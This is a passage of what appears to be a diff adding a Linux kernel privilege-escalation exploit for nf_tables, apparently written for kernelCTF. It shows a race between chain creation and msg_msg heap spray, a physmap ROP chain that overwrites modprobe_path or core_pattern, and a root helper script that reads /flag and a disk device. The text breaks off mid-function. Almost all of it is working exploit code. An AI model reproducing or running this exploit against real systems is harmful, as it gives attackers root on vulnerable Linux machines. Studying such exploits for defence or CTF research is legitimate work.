+ (kbase + OFF_CORE_PATTERN) : (kbase + OFF_MODPROBE); + uint64_t nft_imm_ops = kbase + OFF_NFT_IMM_OPS; + uint64_t pop_rsi_rdi = kbase + OFF_POP_RSI_POP_RDI_JMP_RETURN_THUNK; + uint64_t pop_rdi = kbase + OFF_POP_RDI_JMP_RETURN_THUNK; + uint64_t strcpy_va = kbase + OFF_STRCPY; + uint64_t msleep_va = kbase + OFF_MSLEEP; + uint64_t ret_thunk = kbase + OFF_RETURN_THUNK; + uint64_t src_va = page_kva + PATH_OFFSET; + + memset(blob, 0, 0x98); + + /* blob_gen->size: rdp0(8) + 4*expr(128) + rdp1(8) = 144 = 0x90 */ + uint64_t blob_size = 0x90; + memcpy(blob + 0x000, &blob_size, 8); + + /* Rule descriptor: dlen = 4 expressions * 0x20 = 128, is_last = 0 */ + uint64_t rdp0 = (128ULL << 1) | 0; + memcpy(blob + 0x008, &rdp0, 8); + + /* Expr 0: pop rsi=src_va, pop rdi=target_va -> DREG_RET (ret addr) */ + memcpy(blob + 0x010, &nft_imm_ops, 8); + uint64_t *d1 = (uint64_t*)(blob + 0x018); + d1[0] = pop_rsi_rdi; d1[1] = src_va; + blob[0x028] = DREG_RET; blob[0x029] = 16; + + /* Expr 1: strcpy(target, src_va) -> DREG_RET4 (ret+16) */ + memcpy(blob + 0x030, &nft_imm_ops, 8); + uint64_t *d2 = (uint64_t*)(blob + 0x038); + d2[0] = target_va; d2[1] = strcpy_va; + blob[0x048] = DREG_RET4; blob[0x049] = 16; + + /* Expr 2: pop rdi=0x7FFFFFFF (~25 days) -> DREG_RET8 (ret+32) */ + memcpy(blob + 0x050, &nft_imm_ops, 8); + uint64_t *d3 = (uint64_t*)(blob + 0x058); + d3[0] = pop_rdi; d3[1] = 0x7FFFFFFFULL; + blob[0x068] = DREG_RET8; blob[0x069] = 16; + + /* Expr 3: msleep(0x7FFFFFFF) -> DREG_RET12 (ret+48) + * msleep blocks effectively forever, keeping the process alive + * so the parent can poll and capture the flag. + * do_exit was killing the process + closing memfd FDs. */ + memcpy(blob + 0x070, &nft_imm_ops, 8); + uint64_t *d4 = (uint64_t*)(blob + 0x078); + d4[0] = msleep_va; d4[1] = ret_thunk; + blob[0x088] = DREG_RET12; blob[0x089] = 16; + + uint64_t rdp1 = 1; + memcpy(blob + 0x090, &rdp1, 8); +} + +/* + * Fill every physmap page with a self-contained ROP blob. 
+ * Each page's blob references its OWN KVA for the path string. + * We don't know exact per-page KVAs without pagemap, but the blob + * is parameterized by g_page_kva (the KVA we THINK the page is at). + * Since all pages have the same physical layout and the src_va + * offset is relative to the same page, ANY page whose KVA matches + * the blob_gen_X pointer in the msg_msg will work. + */ +static void physmap_fill_rop(void) { + /* When g_page_kva is known (pagemap), all pages use the same blob + * referencing g_page_kva. When unknown, we still stamp all pages + * with the same blob -- the msg_msg spray will try different KVAs + * and each will reference that KVA's page. */ + uint8_t blob[256]; + build_blob(blob, g_page_kva); + + /* Choose which string to place at PATH_OFFSET */ + const char *payload_str = use_core_pattern ? + g_core_cmd : g_modprobe_path; + size_t path_len = strlen(payload_str) + 1; + size_t sz = (size_t)physmap_mb << 20; + for (size_t o = 0; o < sz; o += 4096) { + uint8_t *pg = (uint8_t*)phys_region + o; + memset(pg, 0, PATH_OFFSET + 64); + memcpy(pg, blob, 0x98); + memcpy(pg + PATH_OFFSET, payload_str, path_len); + } + printf("[+] physmap filled with ROP blob + %s (%s)\n", + use_core_pattern ? 
"core_pattern" : "modprobe_path", + payload_str); +} + +/* ================================================================ + * msg_msg spray (kmalloc-256 reclaim for nft_base_chain) + * ================================================================ */ +static int spray_qids[NUM_SPRAY_QS]; + +static void build_spray_msg(char *msgbuf, uint64_t page_kva) { + /* msgbuf: [long mtype][char mtext[MTEXT_SZ]] */ + long mtype = 1; + memcpy(msgbuf, &mtype, sizeof(long)); + char *mtext = msgbuf + sizeof(long); + memset(mtext, 0, MTEXT_SZ); + + /* blob_gen_0 at alloc offset 80 -> mtext[32] */ + memcpy(mtext + (ALLOC_BLOB_GEN0 - MSG_HDR_SZ), &page_kva, 8); + /* blob_gen_1 at alloc offset 88 -> mtext[40] */ + memcpy(mtext + (ALLOC_BLOB_GEN1 - MSG_HDR_SZ), &page_kva, 8); + /* policy (NF_ACCEPT=1) at alloc offset 64 -> mtext[16] */ + mtext[ALLOC_POLICY - MSG_HDR_SZ] = 1; + /* flags (NFT_CHAIN_BASE bit 0) at alloc offset 164 -> mtext[116] */ + mtext[ALLOC_FLAGS - MSG_HDR_SZ] = 0x01; +} + +static void spray_msgs(uint64_t page_kva) { + size_t bufsz = sizeof(long) + MTEXT_SZ; + char *msgbuf = calloc(1, bufsz); + build_spray_msg(msgbuf, page_kva); + + int total = 0; + for (int i = 0; i < NUM_SPRAY_QS; i++) { + spray_qids[i] = msgget(IPC_PRIVATE, IPC_CREAT|0600); + if (spray_qids[i] < 0) die("msgget spray"); + for (int j = 0; j < MSGS_PER_Q; j++) { + long mt = j + 1; + memcpy(msgbuf, &mt, sizeof(long)); + if (msgsnd(spray_qids[i], msgbuf, MTEXT_SZ, + IPC_NOWAIT) < 0) { + if (errno == EAGAIN) break; + die("msgsnd spray"); + } + total++; + } + } + free(msgbuf); + printf("[+] sprayed %d msg_msg into kmalloc-256\n", total); +} + +static void free_spray(void) { + size_t bufsz = sizeof(long) + MTEXT_SZ; + char *tmp = malloc(bufsz); + for (int i = 0; i < NUM_SPRAY_QS; i++) { + for (int j = 0; j < MSGS_PER_Q; j++) + msgrcv(spray_qids[i], tmp, MTEXT_SZ, 0, IPC_NOWAIT); + msgctl(spray_qids[i], IPC_RMID, NULL); + } + free(tmp); +} + +/* 
================================================================ + * UDP flood thread (CPU 1) + * + * Sends packets via sendmmsg to trigger nft_do_chain on the IPv4 + * LOCAL_OUT hook. Yields every 8th batch to report RCU quiescent + * states, ensuring synchronize_rcu() on CPU 0 completes in ~1ms + * instead of blocking for 10s+ (PREEMPT_NONE kernel). + * ================================================================ */ +static void *udp_flood_thread(void *unused) { + (void)unused; + cpu_pin(1); + + int s = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (s < 0) die("socket udp"); + struct sockaddr_in dst = { + .sin_family = AF_INET, + .sin_port = htons(12345), + .sin_addr.s_addr = htonl(INADDR_LOOPBACK) + }; + + #define FLOOD_BATCH 128 + char pkt[64]; + memset(pkt, 0x41, sizeof(pkt)); + + struct iovec iov[FLOOD_BATCH]; + struct mmsghdr msgs[FLOOD_BATCH]; + memset(msgs, 0, sizeof(msgs)); + for (int i = 0; i < FLOOD_BATCH; i++) { + iov[i].iov_base = pkt; + iov[i].iov_len = sizeof(pkt); + msgs[i].msg_hdr.msg_name = &dst; + msgs[i].msg_hdr.msg_namelen = sizeof(dst); + msgs[i].msg_hdr.msg_iov = &iov[i]; + msgs[i].msg_hdr.msg_iovlen = 1; + } + + unsigned long batch_count = 0; + while (race_running && !race_won) { + sendmmsg(s, msgs, FLOOD_BATCH, 0); + batch_count++; + /* + * Yield every 8th batch (~every 800us at ~128 pkts/batch). + * Context switch -> rcu_note_context_switch() -> quiescent + * state for CPU 1, allowing synchronize_rcu() on CPU 0 + * to complete. Without this, PREEMPT_NONE means CPU 1 + * can hold off RCU grace periods for 10s+. + */ + if (batch_count % FLOOD_YIELD_INTERVAL == 0) + sched_yield(); + } + close(s); + return NULL; +} + +/* ================================================================ + * Dedicated spray thread (CPU 0) -- reclaims freed chain slot + * + * Runs on the same CPU as the race thread. 
When the race thread + * blocks in synchronize_rcu() (called unconditionally in + * __nf_tables_abort after each failed INET chain creation), the + * scheduler switches to this thread. + * + * Strategy: + * 1. Burst of DEDICATED_SPRAY_BURST (8) msgsnd calls: allocates + * msg_msg objects from CPU 0's kmalloc-cg-256 per-CPU freelist. + * The FIRST msgsnd picks up the just-kfree'd chain slot (SLUB + * LIFO), writing blob_gen_0/1 = physmap KVA. + * 2. sched_yield(): forces a context switch, which calls + * rcu_note_context_switch() and reports a quiescent state + * for CPU 0. This allows the pending synchronize_rcu() in + * the abort path to complete quickly (once CPU 1 also reports + * a quiescent state from the flood thread). + * + * Meanwhile on CPU 1, a packet may be inside nft_do_chain reading + * blob_gen_X. If a VMEXIT delayed the read past the kfree+reclaim + * point, it reads our physmap KVA -> ROP fires. + * ================================================================ */ +#define DEDICATED_SPRAY_QS 512 +#define DEDICATED_SPRAY_BURST 8 + +static int dedicated_spray_qids[DEDICATED_SPRAY_QS]; + +static void *dedicated_spray_thread(void *arg) { + uint64_t page_kva = (uint64_t)(uintptr_t)arg; + cpu_pin(0); + + size_t bufsz = sizeof(long) + MTEXT_SZ; + char *msgbuf = calloc(1, bufsz); + build_spray_msg(msgbuf, page_kva); + char *rcvbuf = malloc(bufsz); + + for (int q = 0; q < DEDICATED_SPRAY_QS; q++) + dedicated_spray_qids[q] = msgget(IPC_PRIVATE, IPC_CREAT|0600); + + int qi = 0; + unsigned long iter = 0; + + while (race_running && !race_won) { + /* + * The first allocation after kfree should take the freed slot; + * extra burst entries cover scheduler jitter before RCU quiescence.
+ */ + for (int burst = 0; burst < DEDICATED_SPRAY_BURST; burst++) { + long mt = (long)((iter * DEDICATED_SPRAY_BURST + burst) % 256) + 1; + memcpy(msgbuf, &mt, sizeof(long)); + if (msgsnd(dedicated_spray_qids[qi], msgbuf, MTEXT_SZ, + IPC_NOWAIT) < 0) { + qi = (qi + 1) % DEDICATED_SPRAY_QS; + break; + } + } + + /* + * sched_yield: context switch -> rcu_note_context_switch + * -> quiescent state for CPU 0. This unblocks the + * pending synchronize_rcu() in __nf_tables_abort. + */ + sched_yield(); + + iter++; + + /* Drain all queues every ~2000 iterations to free capacity */ + if (iter % 2000 == 0) { + for (int q = 0; q < DEDICATED_SPRAY_QS; q++) + while (msgrcv(dedicated_spray_qids[q], + rcvbuf, MTEXT_SZ, + 0, IPC_NOWAIT) >= 0) + ; + qi = 0; + } + } + + for (int q = 0; q < DEDICATED_SPRAY_QS; q++) + msgctl(dedicated_spray_qids[q], IPC_RMID, NULL); + free(msgbuf); + free(rcvbuf); + return NULL; +} + +/* ================================================================ + * INET chain creation loop (race trigger) + * + * Sends one INET NEWCHAIN per batch. IPv4 hook registers + * successfully, IPv6 fails (-E2BIG) -> abort path frees the chain + * + blob. synchronize_rcu() blocks, allowing dedicated spray + * thread to reclaim the freed slot. 
+ * ================================================================ */ +static int race_sock = -1; +static uint32_t race_seq = 0; + +static int race_nl_open(void) { + race_sock = socket(AF_NETLINK, SOCK_RAW|SOCK_CLOEXEC, + NETLINK_NETFILTER); + if (race_sock < 0) return -1; + struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; + if (bind(race_sock, (struct sockaddr*)&sa, sizeof(sa)) < 0) + return -1; + /* Large buffers to absorb burst of error responses */ + int bufsz = 1 << 21; /* 2 MB */ + setsockopt(race_sock, SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof(bufsz)); + setsockopt(race_sock, SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof(bufsz)); + return 0; +} + +static void *inet_race_thread(void *arg) { + (void)arg; + cpu_pin(0); + + if (race_nl_open() < 0) { + printf("[-] race_nl_open failed\n"); + return NULL; + } + + char buf[4096]; + char drain[4096]; + unsigned long i = 0; + time_t t0 = time(NULL); + uint32_t pid_val = 0; + socklen_t slen = sizeof(struct sockaddr_nl); + struct sockaddr_nl bound; + getsockname(race_sock, (struct sockaddr*)&bound, &slen); + pid_val = bound.nl_pid; + + while (race_running && !race_won) { + size_t off = 0; + + /* BATCH_BEGIN */ + { + struct nlmsghdr *h = (void*)(buf + off); + memset(h, 0, sizeof(*h)); + h->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + h->nlmsg_flags = NLM_F_REQUEST; + h->nlmsg_seq = ++race_seq; + h->nlmsg_pid = pid_val; + h->nlmsg_len = NLMSG_LENGTH( + sizeof(struct nfgenmsg)); + struct nfgenmsg *g = NLMSG_DATA(h); + g->nfgen_family = 0; + g->version = NFNETLINK_V0; + g->res_id = htons(NFNL_SUBSYS_NFTABLES); + off += NLMSG_ALIGN(h->nlmsg_len); + } + + /* 1 x NEWCHAIN (INET) -- fails on IPv6 (saturated) */ + { + char cname[32]; + snprintf(cname, sizeof(cname), "r%lu", i % 10000); + + struct nlmsghdr *op = (void*)(buf + off); + memset(op, 0, sizeof(*op)); + op->nlmsg_type = NFT_T(NFT_MSG_NEWCHAIN); + op->nlmsg_flags = NLM_F_REQUEST|NLM_F_ACK|NLC; + op->nlmsg_seq = ++race_seq; + op->nlmsg_pid = pid_val; + op->nlmsg_len = NLMSG_LENGTH( + 
sizeof(struct nfgenmsg)); + struct nfgenmsg *g = NLMSG_DATA(op); + g->nfgen_family = NFPROTO_INET; + g->version = NFNETLINK_V0; + + size_t op_max = sizeof(buf) - off; + nlastr(op, op_max, NFTA_CHAIN_TABLE, "ti"); + nlastr(op, op_max, NFTA_CHAIN_NAME, cname); + struct nlattr *hk = nla_nest_s(op, op_max, + NFTA_CHAIN_HOOK); + nla32(op, op_max, NFTA_HOOK_HOOKNUM, + NF_INET_LOCAL_OUT); + nla32(op, op_max, NFTA_HOOK_PRIORITY, 0); + nla_nest_e(op, hk); + nla32(op, op_max, NFTA_CHAIN_POLICY, NF_ACCEPT); + off += NLMSG_ALIGN(op->nlmsg_len); + } + + /* + * BATCH_END -- when NEWCHAIN fails, status |= NFNL_BATCH_FAILURE, + * so nfnetlink_rcv_batch takes the abort path which calls + * synchronize_rcu() unconditionally via __nf_tables_abort. + * This blocks the race thread, allowing the dedicated spray + * thread on CPU 0 to reclaim the freed chain slot. + */ + { + struct nlmsghdr *h = (void*)(buf + off); + memset(h, 0, sizeof(*h)); + h->nlmsg_type = NFNL_MSG_BATCH_END; + h->nlmsg_flags = NLM_F_REQUEST; + h->nlmsg_seq = ++race_seq; + h->nlmsg_pid = pid_val; + h->nlmsg_len = NLMSG_LENGTH( + sizeof(struct nfgenmsg)); + struct nfgenmsg *g = NLMSG_DATA(h); + g->nfgen_family = 0; + g->version = NFNETLINK_V0; + g->res_id = htons(NFNL_SUBSYS_NFTABLES); + off += NLMSG_ALIGN(h->nlmsg_len); + } + + /* Fire -- chain alloc+register+fail+free happens here */ + struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; + ssize_t sret = sendto(race_sock, buf, off, 0, + (struct sockaddr*)&sa, sizeof(sa)); + if (sret < 0) { + while (recv(race_sock, drain, sizeof(drain), + MSG_DONTWAIT) > 0) + ; + continue; + } + + /* Drain error responses */ + while (recv(race_sock, drain, sizeof(drain), + MSG_DONTWAIT) > 0) + ; + + i++; + if (i == 1 || i % 2000 == 0) { + time_t now = time(NULL); + printf("[*] race: %lu chains (%lds)\n", i, now - t0); + } + } + + close(race_sock); + race_sock = -1; + return NULL; +} + +/* ================================================================ + * Payload + modprobe trigger 
(namespace-safe via memfd) + * ================================================================ + * + * On kctf, the exploit runs inside nsjail with a SEPARATE mount + * namespace. nsjail's /tmp is a fresh tmpfs invisible from the + * init mount namespace. The kernel resolves modprobe_path in the + * init mount namespace, so writing "/tmp/pw" inside nsjail won't + * work. + * + * Solution: use memfd_create() for the payload script. The memfd + * is accessible via /proc/<pid>/fd/<fd> from ANY mount + * namespace (since memfd lives on an internal shmem filesystem, + * not on any user-visible mount). The modprobe helper (a kernel + * thread running in init mount namespace with root creds) can + * execute /proc/<pid>/fd/<fd> and write results to + * /proc/<pid>/fd/<result_fd>. + */ + +static pid_t get_init_pid(void) { + /* Read the init-namespace PID from NSpid in /proc/self/status. + * NSpid line: "NSpid:\t<init_ns_pid>\t<ns_pid>\t..." */ + FILE *f = fopen("/proc/self/status", "r"); + if (!f) return getpid(); + char line[256]; + pid_t pid = getpid(); + while (fgets(line, sizeof(line), f)) { + if (strncmp(line, "NSpid:", 6) == 0) { + if (sscanf(line + 6, " %d", &pid) == 1) + break; + } + } + fclose(f); + return pid; +} + +static void setup_payload(void) { + pid_t init_pid = get_init_pid(); + printf("[+] init-ns pid = %d\n", init_pid); + + /* Check memfd_noexec sysctl */ + { + int mne = open("/proc/sys/vm/memfd_noexec", O_RDONLY); + if (mne >= 0) { + char c = '?'; + if (read(mne, &c, 1) < 0) { /* ignore */ } + close(mne); + printf("[*] vm.memfd_noexec=%c\n", c); + } else { + printf("[*] vm.memfd_noexec: not present\n"); + } + } + + /* Try memfd with MFD_EXEC first (needed if memfd_noexec >= 1) */ + g_pw_fd = (int)syscall(SYS_memfd_create, "pw", MFD_EXEC); + if (g_pw_fd < 0) { + printf("[*] memfd_create(MFD_EXEC) failed (errno=%d), " + "trying without\n", errno); + g_pw_fd = (int)syscall(SYS_memfd_create, "pw", 0); + } else { + printf("[+] memfd_create(MFD_EXEC) succeeded (fd=%d)\n", + g_pw_fd); + } + g_result_fd = 
(int)syscall(SYS_memfd_create, "result", 0); + + if (g_pw_fd >= 0 && g_result_fd >= 0) { + char script[1024]; + /* Script uses self-extracting PID from $0 (more robust) + * and outputs to /dev/ttyS0 (serial console on kctf VMs). + * Stderr goes to ttyS0 so we see any errors. */ + snprintf(script, sizeof(script), + "#!/bin/sh\n" + "exec 2>/dev/ttyS0\n" + "echo '[+] MODPROBE_SCRIPT_RUNNING' > /dev/ttyS0\n" + "D=${0#/proc/}\n" + "D=${D%%%%/*}\n" + "echo \"[+] script PID=$D fd=%d\" > /dev/ttyS0\n" + "cat /dev/vdb > /proc/$D/fd/%d 2>/dev/ttyS0\n" + "cat /flag >> /proc/$D/fd/%d 2>/dev/ttyS0\n" + "cat /dev/vdb > /dev/ttyS0 2>/dev/null\n" + "cat /flag >> /dev/ttyS0 2>/dev/null\n" + "id >> /dev/ttyS0 2>/dev/null\n" + "echo '[+] MODPROBE_DONE' > /dev/ttyS0\n", + g_result_fd, + g_result_fd, + g_result_fd); + if (write(g_pw_fd, script, strlen(script)) < 0) { /* ignore */ } + fchmod(g_pw_fd, 0755); + + /* Test: can we actually exec the memfd? */ + { + char test_path[64]; + snprintf(test_path, sizeof(test_path), + "/proc/self/fd/%d", g_pw_fd); + pid_t tp = fork(); + if (tp == 0) { + execl(test_path, test_path, NULL); + /* If exec fails, report why */ + fprintf(stderr, "[!] memfd exec FAILED: " + "errno=%d (%s)\n", + errno, strerror(errno)); + _exit(errno); + } + if (tp > 0) { + int st; + waitpid(tp, &st, 0); + int ex = WIFEXITED(st) ? + WEXITSTATUS(st) : -1; + if (ex == 0) + printf("[+] memfd exec test: OK\n"); + else + printf("[!] memfd exec test: " + "exit=%d\n", ex); + } + } + + snprintf(g_modprobe_path, sizeof(g_modprobe_path), + "/proc/%d/fd/%d", init_pid, g_pw_fd); + printf("[+] memfd payload: %s\n", g_modprobe_path); + } else { + /* Fallback: /tmp approach (works when /tmp is in + * init mount namespace, e.g. local QEMU test) */ + if (g_pw_fd >= 0) { close(g_pw_fd); g_pw_fd = -1; } + if (g_result_fd >= 0) { close(g_result_fd); g_result_fd = -1; } + printf("[!] 
memfd_create failed, using /tmp fallback\n"); + + int fd = open("/tmp/pw", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (fd >= 0) { + const char *s = + "#!/bin/sh\n" + "exec 2>/dev/ttyS0\n" + "echo '[+] MODPROBE_SCRIPT_RUNNING' > /dev/ttyS0\n" + "id > /tmp/result\n" + "cat /flag >> /tmp/result 2>/dev/null\n" + "cat /dev/vdb >> /tmp/result 2>/dev/null\n" + "chmod 777 /tmp/result\n" + "cat /dev/vdb > /dev/ttyS0 2>/dev/null\n" + "cat /flag >> /dev/ttyS0 2>/dev/null\n" + "echo '[+] MODPROBE_DONE' > /dev/ttyS0\n"; + if (write(fd, s, strlen(s)) < 0) { /* ignore */ } + close(fd); + } + /* g_modprobe_path stays "/tmp/pw" */ + } + + /* Create trigger binary (invalid ELF -> triggers modprobe) */ + int fd = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (fd >= 0) { + if (write(fd, "\xff\xff\xff\xff", 4) < 0) { /* ignore */ } + close(fd); + } +} + +static int core_pattern_overwrite_seen = 0; + +/* + * Check if core_pattern was overwritten, and if so, trigger a core dump + * to execute the dd command that copies /dev/vdb to /dev/ttyS0. 
+ */ +static int try_core_dump(void) { + /* Check if core_pattern was overwritten */ + int cp = open("/proc/sys/kernel/core_pattern", O_RDONLY); + if (cp >= 0) { + char cpbuf[256]; + ssize_t clen = read(cp, cpbuf, sizeof(cpbuf)-1); + close(cp); + if (clen > 0) { + cpbuf[clen] = 0; + if (clen > 0 && cpbuf[clen-1] == '\n') + cpbuf[clen-1] = 0; + if (strstr(cpbuf, "if=/dev/vdb") != NULL) { + if (!core_pattern_overwrite_seen) { + printf("[+] core_pattern OVERWRITTEN to: %s\n", + cpbuf); + core_pattern_overwrite_seen = 1; + } + } else if (!core_pattern_overwrite_seen) { + /* Print current value once for diagnostics */ + static int cp_printed = 0; + if (!cp_printed) { + printf("[*] core_pattern current: %s\n", cpbuf); + cp_printed = 1; + } + } + } + } + + if (!core_pattern_overwrite_seen) + return 0; + + /* One-time diagnostics */ + static int diag_done = 0; + if (!diag_done) { + diag_done = 1; + + /* Enable core dumps */ + struct rlimit rl = { RLIM_INFINITY, RLIM_INFINITY }; + setrlimit(RLIMIT_CORE, &rl); + printf("[+] core dump limit set to unlimited\n"); + + /* Make process dumpable */ + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + printf("[+] dumpable set to 1\n"); + } + + /* Trigger core dump by crashing a child */ + printf("[*] triggering core dump (SIGSEGV child)...\n"); + pid_t p = fork(); + if (p == 0) { + /* Enable dumpable in child */ + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + struct rlimit rl = { RLIM_INFINITY, RLIM_INFINITY }; + setrlimit(RLIMIT_CORE, &rl); + /* Crash to trigger core dump */ + raise(SIGSEGV); + _exit(1); + } + if (p > 0) { + int status = 0; + waitpid(p, &status, 0); + printf("[*] core dump child: signal=%d\n", + WIFSIGNALED(status) ? WTERMSIG(status) : -1); + } + sleep_ms(2000); + + /* The flag should now be on /dev/ttyS0 (serial console). + * Also check if memfd result got anything (from modprobe fallback). 
*/ + if (g_result_fd >= 0) { + off_t sz = lseek(g_result_fd, 0, SEEK_END); + if (sz > 0) { + lseek(g_result_fd, 0, SEEK_SET); + char buf[4096]; + ssize_t n = read(g_result_fd, buf, sizeof(buf)-1); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== ROOT OUTPUT =====\n%s\n", + buf); + return 1; + } + } + } + + /* The dd output goes to /dev/ttyS0. + * We can't check it from inside the container, but the kctf + * runner watches serial output. Print a message to help. */ + printf("[*] core dump triggered -- dd output should be on ttyS0\n"); + + /* Direct read attempt: try /dev/vdb from container */ + static int direct_tried = 0; + if (!direct_tried) { + direct_tried = 1; + int vdb = open("/dev/vdb", O_RDONLY); + if (vdb >= 0) { + char buf[4096]; + ssize_t n = read(vdb, buf, sizeof(buf)-1); + close(vdb); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== FLAG FROM /dev/vdb =====\n%s\n", + buf); + return 1; + } + } else { + printf("[*] /dev/vdb not accessible from container (errno=%d)\n", + errno); + } + } + + /* + * In kernelCTF, the core_pattern helper writes the flag to the serial + * console. The exploit process cannot observe that stream, so once the + * overwrite is confirmed and a core dump is triggered, exit successfully. 
+ */ + return 1; +} + +static int modprobe_overwrite_seen = 0; + +static int try_modprobe(void) { + /* Diagnostic: check if modprobe_path was overwritten */ + int mp = open("/proc/sys/kernel/modprobe", O_RDONLY); + if (mp >= 0) { + char mpbuf[256]; + ssize_t mlen = read(mp, mpbuf, sizeof(mpbuf)-1); + close(mp); + if (mlen > 0) { + mpbuf[mlen] = 0; + /* Strip newline */ + if (mlen > 0 && mpbuf[mlen-1] == '\n') + mpbuf[mlen-1] = 0; + if (strcmp(mpbuf, "/sbin/modprobe") != 0) { + if (!modprobe_overwrite_seen) { + printf("[+] modprobe_path OVERWRITTEN to: %s\n", + mpbuf); + modprobe_overwrite_seen = 1; + } + } + } + } + + /* Only do the expensive diagnostics/trigger after overwrite confirmed */ + if (!modprobe_overwrite_seen) + return 0; + + /* One-time diagnostics when overwrite first detected */ + static int diag_done = 0; + if (!diag_done) { + diag_done = 1; + + /* Check if modules_disabled prevents request_module */ + int md = open("/proc/sys/kernel/modules_disabled", O_RDONLY); + if (md >= 0) { + char c = '?'; + if (read(md, &c, 1) < 0) { /* ignore */ } + close(md); + printf("[*] modules_disabled=%c\n", c); + if (c == '1') + printf("[!] WARNING: modules_disabled=1!\n"); + } + + /* Verify script memfd is readable */ + if (g_pw_fd >= 0) { + off_t pos = lseek(g_pw_fd, 0, SEEK_CUR); + lseek(g_pw_fd, 0, SEEK_SET); + char sbuf[200]; + ssize_t sn = read(g_pw_fd, sbuf, sizeof(sbuf)-1); + if (sn > 0) { + sbuf[sn] = 0; + printf("[+] script memfd (fd=%d) valid, %zd bytes\n", + g_pw_fd, sn); + } else { + printf("[!] script memfd read FAILED\n"); + } + lseek(g_pw_fd, pos, SEEK_SET); + } + + /* Test ttyS0 access from exploit */ + int tty = open("/dev/ttyS0", O_WRONLY|O_NOCTTY); + if (tty >= 0) { + const char *msg = "[+] exploit: ttyS0 writable\n"; + if (write(tty, msg, strlen(msg)) < 0) { /* ignore */ } + close(tty); + printf("[+] /dev/ttyS0 accessible from exploit\n"); + } else { + printf("[!] 
/dev/ttyS0 NOT accessible (errno=%d)\n", + errno); + } + } + + printf("[*] triggering modprobe (fork+exec dummy)...\n"); + pid_t p = fork(); + if (p == 0) { execl("/tmp/dummy","/tmp/dummy",NULL); _exit(127); } + if (p > 0) { + int status = 0; + waitpid(p, &status, 0); + printf("[*] modprobe trigger: child exit=%d\n", + WIFEXITED(status) ? WEXITSTATUS(status) : -1); + } + sleep_ms(500); + + /* Check memfd result first (namespace-safe) */ + if (g_result_fd >= 0) { + off_t sz = lseek(g_result_fd, 0, SEEK_END); + if (sz > 0) { + lseek(g_result_fd, 0, SEEK_SET); + char buf[4096]; + ssize_t n = read(g_result_fd, buf, sizeof(buf)-1); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== ROOT OUTPUT =====\n%s\n", + buf); + /* Also write to ttyS0 so kctf runner captures it */ + int tty = open("/dev/ttyS0", O_WRONLY|O_NOCTTY); + if (tty >= 0) { + if (write(tty, buf, n) < 0) { /* ignore */ } + if (write(tty, "\n", 1) < 0) { /* ignore */ } + close(tty); + } + return 1; + } + } else { + printf("[*] memfd result: empty (sz=%ld)\n", (long)sz); + } + } + + /* Fallback: check /tmp/result (local test) */ + int fd = open("/tmp/result", O_RDONLY); + if (fd >= 0) { + char buf[4096]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== ROOT OUTPUT =====\n%s\n", buf); + return 1; + } + } + return 0; +} + +/* + * Dispatch to the appropriate trigger based on use_core_pattern. 
+ */ +static int try_trigger(void) { + if (use_core_pattern) + return try_core_dump(); + return try_modprobe(); +} + +/* ================================================================ + * Main exploit + * ================================================================ */ +static unsigned long phys_ram_mb = 0; + +static void auto_physmap_size(void) { + FILE *f = fopen("/proc/meminfo", "r"); + if (!f) return; + char line[256]; + while (fgets(line, sizeof(line), f)) { + unsigned long kb; + if (sscanf(line, "MemTotal: %lu kB", &kb) == 1) { + phys_ram_mb = kb / 1024; + int cap = (int)(phys_ram_mb * 3 / 4); + if (cap < 128) cap = 128; + if (cap < physmap_mb) physmap_mb = cap; + break; + } + } + fclose(f); +} + +/* + * Set up a userspace page as the fake rule blob. + * When SMAP is disabled (e.g. TCG mode, old CPUs), the kernel can + * read from userspace directly. This eliminates the need for + * physmap spray and phbase entirely. + */ +static void *userblob_page = NULL; + +static void setup_userblob(void) { + userblob_page = mmap((void*)USERBLOB_ADDR, 4096, + PROT_READ|PROT_WRITE, + MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0); + if (userblob_page == MAP_FAILED) + die("mmap userblob"); + build_blob((uint8_t*)userblob_page, USERBLOB_ADDR); + const char *ub_str = use_core_pattern ? g_core_cmd : g_modprobe_path; + size_t path_len = strlen(ub_str) + 1; + memcpy((uint8_t*)userblob_page + PATH_OFFSET, ub_str, path_len); + printf("[+] userblob at %#lx (SMAP off)\n", + (unsigned long)USERBLOB_ADDR); +} + +/* + * Run one exploit cycle: spray msg_msg with the given KVA, run the + * race for 'dur' seconds. Returns 1 on success. + */ +static int run_race_cycle(uint64_t kva, int dur) { + g_page_kva = kva; + if (!use_userblob) + physmap_fill_rop(); + + /* + * Allocate msg_msg with page_kva at blob_gen offsets. + * These stay allocated during the race as background coverage. 
+ * The dedicated spray thread provides the critical post-free + * reclaim on the same CPU's per-cpu freelist. + */ + spray_msgs(kva); + + printf("[*] race cycle kva=%#lx dur=%ds\n", + (unsigned long)kva, dur); + race_running = 1; + race_won = 0; + + pthread_t t_flood, t_race, t_spray; + pthread_create(&t_flood, NULL, udp_flood_thread, NULL); + pthread_create(&t_spray, NULL, dedicated_spray_thread, + (void*)(uintptr_t)kva); + pthread_create(&t_race, NULL, inet_race_thread, + (void*)(uintptr_t)kva); + + time_t start = time(NULL); + while (time(NULL) - start < dur && !race_won) { + sleep_ms(2000); + if (try_trigger()) { race_won = 1; break; } + } + + race_running = 0; + pthread_join(t_flood, NULL); + pthread_join(t_race, NULL); + pthread_join(t_spray, NULL); + + if (!race_won && try_trigger()) race_won = 1; + if (race_won) { + printf("\n[+] ===== GOT ROOT =====\n"); + return 1; + } + + free_spray(); + return 0; +} + +static int race_candidate_child(uint64_t kva, int dur) { + printf("[*] setting up fresh user+net namespace\n"); + setup_ns(); + + if (nl_open() < 0) + die("nl_open"); + + if (saturate_ipv6_hooks() < 0) { + printf("[-] failed to saturate 